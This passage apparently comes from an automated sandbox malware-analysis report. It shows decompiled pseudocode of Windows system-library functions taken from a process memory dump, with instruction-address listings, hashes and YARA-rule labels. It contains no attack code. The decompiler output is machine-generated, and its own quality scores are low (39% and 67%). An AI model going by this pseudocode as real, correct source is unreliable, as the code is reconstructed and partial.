					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                  0x049603f1
                                                                  0x049603f7
                                                                  0x049603f9
                                                                  0x049603fb
                                                                  0x049603fd
                                                                  0x04960400
                                                                  0x0496040a
                                                                  0x049a4c7a
                                                                  0x04960537
                                                                  0x04960547
                                                                  0x04960410
                                                                  0x04960410
                                                                  0x04960414
                                                                  0x04960417
                                                                  0x0496041a
                                                                  0x04960421
                                                                  0x04960424
                                                                  0x0496042b
                                                                  0x0496043b
                                                                  0x0496043e
                                                                  0x0496043f
                                                                  0x0496043f
                                                                  0x04960446
                                                                  0x04960449
                                                                  0x0496044c
                                                                  0x0496044f
                                                                  0x04960459
                                                                  0x049a4c8d
                                                                  0x0496045f
                                                                  0x0496045f
                                                                  0x0496045f
                                                                  0x04960467
                                                                  0x049a4c97
                                                                  0x049a4c9d
                                                                  0x049a4ca4
                                                                  0x049a4caa
                                                                  0x049a4caf
                                                                  0x049a4cb1
                                                                  0x049a4cc3
                                                                  0x049a4cb3
                                                                  0x049a4cbc
                                                                  0x049a4cbc
                                                                  0x049a4cc8
                                                                  0x049a4ccb
                                                                  0x049a4cd7
                                                                  0x049a4cda
                                                                  0x049a4cdf
                                                                  0x049a4cdf
                                                                  0x049a4ccb
                                                                  0x049a4ca4
                                                                  0x0496046d
                                                                  0x0496046f
                                                                  0x0496046f
                                                                  0x04960471
                                                                  0x04960476
                                                                  0x0496047a
                                                                  0x0496047b
                                                                  0x04960483
                                                                  0x04960489
                                                                  0x0496048d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4ce9
                                                                  0x049a4cef
                                                                  0x049a4d22
                                                                  0x049a4d22
                                                                  0x00000000
                                                                  0x049a4d22
                                                                  0x049a4cf1
                                                                  0x049a4cf7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4cf9
                                                                  0x049a4cff
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4d05
                                                                  0x049a4d07
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4d0d
                                                                  0x049a4d0f
                                                                  0x049a4d14
                                                                  0x049a4d16
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4d1c
                                                                  0x049a4d1c
                                                                  0x04960499
                                                                  0x04960535
                                                                  0x04960535
                                                                  0x00000000
                                                                  0x04960535
                                                                  0x049604a6
                                                                  0x049a4d2c
                                                                  0x049a4d37
                                                                  0x049a4d39
                                                                  0x049a4d3b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4d41
                                                                  0x049a4d48
                                                                  0x04960527
                                                                  0x0496052b
                                                                  0x0496052d
                                                                  0x04960530
                                                                  0x04960530
                                                                  0x00000000
                                                                  0x0496052b
                                                                  0x049a4d4e
                                                                  0x049604ac
                                                                  0x049604ac
                                                                  0x049604af
                                                                  0x049604b2
                                                                  0x049604b7
                                                                  0x049604b9
                                                                  0x049604bb
                                                                  0x049604bd
                                                                  0x049604bf
                                                                  0x049604c5
                                                                  0x049604c9
                                                                  0x049a4d53
                                                                  0x049a4d59
                                                                  0x049a4db9
                                                                  0x049a4dba
                                                                  0x049a4dbf
                                                                  0x049a4dc2
                                                                  0x049a4dc4
                                                                  0x049a4dc7
                                                                  0x049a4dce
                                                                  0x00000000
                                                                  0x049a4dce
                                                                  0x049a4d5b
                                                                  0x049a4d61
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4d63
                                                                  0x049a4d69
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4d6b
                                                                  0x049a4d6e
                                                                  0x049a4d74
                                                                  0x049a4d76
                                                                  0x049a4d7c
                                                                  0x049a4d7e
                                                                  0x049a4d84
                                                                  0x049a4d89
                                                                  0x049a4d8c
                                                                  0x049a4d8d
                                                                  0x049a4d92
                                                                  0x049a4d95
                                                                  0x049a4d96
                                                                  0x049a4d98
                                                                  0x049a4d9a
                                                                  0x049a4d9f
                                                                  0x049a4da4
                                                                  0x049a4da6
                                                                  0x049a4da8
                                                                  0x049a4daf
                                                                  0x049a4db1
                                                                  0x049a4db1
                                                                  0x049a4daf
                                                                  0x049a4da6
                                                                  0x049a4d84
                                                                  0x049a4d7c
                                                                  0x00000000
                                                                  0x049a4d74
                                                                  0x049604d6
                                                                  0x049a4de1
                                                                  0x049604dc
                                                                  0x049604dc
                                                                  0x049604dc
                                                                  0x049604e4
                                                                  0x049a4deb
                                                                  0x049a4df1
                                                                  0x049a4df8
                                                                  0x049a4dfe
                                                                  0x049a4e03
                                                                  0x049a4e05
                                                                  0x049a4e17
                                                                  0x049a4e07
                                                                  0x049a4e10
                                                                  0x049a4e10
                                                                  0x049a4e1c
                                                                  0x049a4e1f
                                                                  0x049a4e35
                                                                  0x049a4e35
                                                                  0x049a4e1f
                                                                  0x049a4df8
                                                                  0x049604f1
                                                                  0x049604fa
                                                                  0x049a4e3f
                                                                  0x049a4e47
                                                                  0x049a4e5b
                                                                  0x049a4e61
                                                                  0x049a4e67
                                                                  0x049a4e69
                                                                  0x049a4e71
                                                                  0x049a4e73
                                                                  0x04960500
                                                                  0x04960500
                                                                  0x04960500
                                                                  0x049604fa
                                                                  0x04960508
                                                                  0x0496051d
                                                                  0x0496051d
                                                                  0x0496051f
                                                                  0x04960524
                                                                  0x00000000
                                                                  0x04960524
                                                                  0x04960515
                                                                  0x04960517
                                                                  0x049a4e7a
                                                                  0x049a4e7c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4e85
                                                                  0x00000000
                                                                  0x049a4e85
                                                                  0x00000000
                                                                  0x04960517

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: baa4ec1ca6e866f2040f2f4af804ceedd469a4f1cfbb213fd351f536c37e1aea
                                                                  • Instruction ID: 15964c16371e1abadf53b876e7e5e5f1e0f94cdac7de9fdc2b3bddbde8d6850a
                                                                  • Opcode Fuzzy Hash: baa4ec1ca6e866f2040f2f4af804ceedd469a4f1cfbb213fd351f536c37e1aea
                                                                  • Instruction Fuzzy Hash: FC91F631E00218AFEB31DA69C984BAD7BA9EB41724F150275ED52AB2D1E7B4BD10C7C1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493C600, Relevance: .2, Instructions: 225COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 67%
                                                                  			E0493C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4a2d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04946D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0497B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4a27b9c; // 0x0
					_t74 = L04954620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04979650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L049577F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0497F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E049713C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L049577F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04979650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                  0x0493c608
                                                                  0x0493c615
                                                                  0x0493c625
                                                                  0x0493c62d
                                                                  0x0493c635
                                                                  0x0493c640
                                                                  0x0493c680
                                                                  0x0493c687
                                                                  0x0493c688
                                                                  0x0493c689
                                                                  0x0493c694
                                                                  0x0493c694
                                                                  0x0493c642
                                                                  0x0493c64a
                                                                  0x0493c697
                                                                  0x049a7a25
                                                                  0x049a7a2b
                                                                  0x049a7a2e
                                                                  0x049a7a30
                                                                  0x049a7bea
                                                                  0x049a7bea
                                                                  0x00000000
                                                                  0x049a7bea
                                                                  0x049a7a36
                                                                  0x049a7a43
                                                                  0x049a7a48
                                                                  0x049a7a4c
                                                                  0x049a7a4e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7a58
                                                                  0x049a7a5a
                                                                  0x049a7a5b
                                                                  0x049a7a5c
                                                                  0x049a7a5d
                                                                  0x049a7a63
                                                                  0x049a7a64
                                                                  0x049a7a6a
                                                                  0x049a7a6c
                                                                  0x049a7a6e
                                                                  0x049a79cb
                                                                  0x049a79cb
                                                                  0x049a79ce
                                                                  0x049a79d0
                                                                  0x049a7a98
                                                                  0x049a7a9b
                                                                  0x049a7a9b
                                                                  0x049a7a9e
                                                                  0x049a7aa1
                                                                  0x049a7bbe
                                                                  0x049a7bbe
                                                                  0x049a7bc0
                                                                  0x049a7be0
                                                                  0x049a7be0
                                                                  0x049a7a01
                                                                  0x049a7a01
                                                                  0x049a7a05
                                                                  0x049a7a07
                                                                  0x049a7a15
                                                                  0x049a7a15
                                                                  0x049a7a1a
                                                                  0x00000000
                                                                  0x049a7a1a
                                                                  0x049a7bc2
                                                                  0x049a7bc6
                                                                  0x049a7bc9
                                                                  0x049a7bcd
                                                                  0x049a7bcf
                                                                  0x049a79e6
                                                                  0x049a79e6
                                                                  0x049a79eb
                                                                  0x049a79eb
                                                                  0x049a79ef
                                                                  0x049a79f1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a79f3
                                                                  0x049a79f5
                                                                  0x049a79ff
                                                                  0x049a79ff
                                                                  0x00000000
                                                                  0x049a79ff
                                                                  0x049a79f7
                                                                  0x049a79fd
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a79fd
                                                                  0x049a7bd5
                                                                  0x049a7bd8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7ba9
                                                                  0x049a7bac
                                                                  0x049a7bb0
                                                                  0x049a7bb1
                                                                  0x049a7bb1
                                                                  0x049a7bb6
                                                                  0x00000000
                                                                  0x049a7bb6
                                                                  0x049a7aa7
                                                                  0x049a7aaa
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7ab2
                                                                  0x049a7ab3
                                                                  0x049a7ab5
                                                                  0x049a7aec
                                                                  0x049a7aef
                                                                  0x049a7b25
                                                                  0x049a7b28
                                                                  0x049a7b62
                                                                  0x049a7b64
                                                                  0x049a7b8f
                                                                  0x049a7b92
                                                                  0x049a7b96
                                                                  0x049a7b98
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7b9e
                                                                  0x049a7b9f
                                                                  0x049a7ba3
                                                                  0x00000000
                                                                  0x049a7ba3
                                                                  0x049a7b66
                                                                  0x049a7b68
                                                                  0x049a7ae2
                                                                  0x049a7ae2
                                                                  0x00000000
                                                                  0x049a7ae2
                                                                  0x049a7b6e
                                                                  0x049a7b72
                                                                  0x049a7b75
                                                                  0x049a7b81
                                                                  0x049a7b85
                                                                  0x049a7b87
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7b31
                                                                  0x049a7b34
                                                                  0x049a7b3c
                                                                  0x049a7b45
                                                                  0x049a7b46
                                                                  0x049a7b4f
                                                                  0x049a7b51
                                                                  0x049a7b57
                                                                  0x049a7b59
                                                                  0x049a7b59
                                                                  0x00000000
                                                                  0x049a7b59
                                                                  0x049a7b77
                                                                  0x00000000
                                                                  0x049a7b77
                                                                  0x049a7b2a
                                                                  0x00000000
                                                                  0x049a7b2a
                                                                  0x049a7af1
                                                                  0x049a7af3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7afb
                                                                  0x049a7afc
                                                                  0x049a7afe
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7b00
                                                                  0x049a7b03
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7b05
                                                                  0x049a7b09
                                                                  0x049a7b0d
                                                                  0x049a7b0f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7b18
                                                                  0x049a7b1d
                                                                  0x00000000
                                                                  0x049a7b1d
                                                                  0x049a7ab7
                                                                  0x049a7ab9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7abf
                                                                  0x049a7ac1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7ac3
                                                                  0x049a7ac6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7ac8
                                                                  0x049a7acc
                                                                  0x049a7ad0
                                                                  0x049a7ad2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7adb
                                                                  0x00000000
                                                                  0x049a7adb
                                                                  0x049a79d6
                                                                  0x049a79d9
                                                                  0x049a79dc
                                                                  0x049a7a91
                                                                  0x049a7a94
                                                                  0x00000000
                                                                  0x049a7a94
                                                                  0x049a79e2
                                                                  0x00000000
                                                                  0x049a79e2
                                                                  0x049a7a74
                                                                  0x049a7a7a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7a8a
                                                                  0x049a7a21
                                                                  0x049a7a21
                                                                  0x00000000
                                                                  0x049a7a21
                                                                  0x0493c650
                                                                  0x0493c651
                                                                  0x0493c656
                                                                  0x0493c65c
                                                                  0x0493c65d
                                                                  0x0493c663
                                                                  0x0493c664
                                                                  0x0493c66a
                                                                  0x0493c66e
                                                                  0x049a79c5
                                                                  0x049a79c7
                                                                  0x00000000
                                                                  0x049a79c7
                                                                  0x0493c67a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 8ca6a912cb0ae17090a4e2ec6d08226e6e2e045e10bc6343b5e06474688cea10
                                                                  • Instruction ID: ab78f003a62a6569c5eb86d667b7b4ebc70993059095684cdab3a69a0326b59a
                                                                  • Opcode Fuzzy Hash: 8ca6a912cb0ae17090a4e2ec6d08226e6e2e045e10bc6343b5e06474688cea10
                                                                  • Instruction Fuzzy Hash: 8C8180B56047019FDB25CE94C882A7B73A9EB84358F2448BAED459B240E330FD55CBE2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049CB8D0, Relevance: .2, Instructions: 199COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 39%
                                                                  			E049CB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4a27b9c; // 0x0
				_t124 = L04954620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04979800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E049795B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E049795D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L049577F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04979910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E049795D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4a27b9c; // 0x0
									_t92 = L04954620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04979910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0493A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E049CE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E049CE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E049795B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                  0x049cb8d9
                                                                  0x049cb8e4
                                                                  0x00000000
                                                                  0x049cb8e6
                                                                  0x049cb8f3
                                                                  0x049cb8f5
                                                                  0x049cb8f5
                                                                  0x049cb8f8
                                                                  0x049cb920
                                                                  0x049cb924
                                                                  0x049cb936
                                                                  0x049cb939
                                                                  0x049cb93d
                                                                  0x049cb948
                                                                  0x049cb9a0
                                                                  0x049cb9a0
                                                                  0x049cb9a4
                                                                  0x049cb9bf
                                                                  0x049cb9c4
                                                                  0x049cb9c6
                                                                  0x049cb9cd
                                                                  0x049cb9d1
                                                                  0x049cbad4
                                                                  0x049cbad8
                                                                  0x049cbada
                                                                  0x049cbadc
                                                                  0x049cbadc
                                                                  0x049cbadf
                                                                  0x049cbae0
                                                                  0x049cbae2
                                                                  0x049cbae4
                                                                  0x049cbaec
                                                                  0x049cbaee
                                                                  0x049cbaf0
                                                                  0x049cbaf0
                                                                  0x049cbaec
                                                                  0x049cbafb
                                                                  0x049cbafc
                                                                  0x049cbafe
                                                                  0x049cbb01
                                                                  0x049cbb01
                                                                  0x00000000
                                                                  0x049cbb06
                                                                  0x049cb9d7
                                                                  0x049cb9db
                                                                  0x049cb9db
                                                                  0x049cb9de
                                                                  0x049cb9de
                                                                  0x049cb9e4
                                                                  0x049cb9e7
                                                                  0x049cb9ea
                                                                  0x049cb9ec
                                                                  0x049cb9ef
                                                                  0x049cb9f3
                                                                  0x049cba1b
                                                                  0x049cba1b
                                                                  0x049cba23
                                                                  0x049cba24
                                                                  0x049cba27
                                                                  0x049cba2a
                                                                  0x049cba2b
                                                                  0x049cba2e
                                                                  0x049cba30
                                                                  0x049cba37
                                                                  0x049cba3f
                                                                  0x049cba9c
                                                                  0x049cbaa2
                                                                  0x049cbb13
                                                                  0x049cbb15
                                                                  0x049cbaae
                                                                  0x049cbaae
                                                                  0x049cbab3
                                                                  0x049cbab5
                                                                  0x049cbaba
                                                                  0x049cbac8
                                                                  0x049cbac8
                                                                  0x049cbaba
                                                                  0x049cbacd
                                                                  0x049cbacf
                                                                  0x00000000
                                                                  0x049cbacf
                                                                  0x049cbb1a
                                                                  0x00000000
                                                                  0x049cbb1c
                                                                  0x049cbaa7
                                                                  0x049cbb11
                                                                  0x00000000
                                                                  0x049cbb11
                                                                  0x049cbaa9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049cba41
                                                                  0x049cba41
                                                                  0x049cba41
                                                                  0x049cba58
                                                                  0x049cba5d
                                                                  0x049cba62
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049cba64
                                                                  0x049cba67
                                                                  0x049cba68
                                                                  0x049cba69
                                                                  0x049cba6c
                                                                  0x049cba6f
                                                                  0x049cba71
                                                                  0x049cba78
                                                                  0x049cba80
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049cba90
                                                                  0x049cba90
                                                                  0x049cba97
                                                                  0x00000000
                                                                  0x049cba97
                                                                  0x049cb9f5
                                                                  0x049cb9f7
                                                                  0x049cb9f7
                                                                  0x049cb9fa
                                                                  0x049cba03
                                                                  0x049cba07
                                                                  0x049cba0c
                                                                  0x049cba10
                                                                  0x049cba17
                                                                  0x00000000
                                                                  0x049cb9f7
                                                                  0x049cb9a6
                                                                  0x049cb9a8
                                                                  0x049cb9af
                                                                  0x049cb9b3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049cb9b9
                                                                  0x00000000
                                                                  0x049cb9b9
                                                                  0x049cb94d
                                                                  0x049cb98f
                                                                  0x049cb995
                                                                  0x049cb999
                                                                  0x049cb960
                                                                  0x049cb967
                                                                  0x049cb968
                                                                  0x049cb96a
                                                                  0x00000000
                                                                  0x049cb96a
                                                                  0x049cb99b
                                                                  0x049cb99e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049cb99e
                                                                  0x049cb951
                                                                  0x049cb954
                                                                  0x049cb95a
                                                                  0x049cb95e
                                                                  0x049cb972
                                                                  0x049cb979
                                                                  0x049cb97d
                                                                  0x049cb97f
                                                                  0x049cb980
                                                                  0x049cb982
                                                                  0x049cb984
                                                                  0x00000000
                                                                  0x049cb984
                                                                  0x00000000
                                                                  0x049cb926
                                                                  0x00000000
                                                                  0x049cb926

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
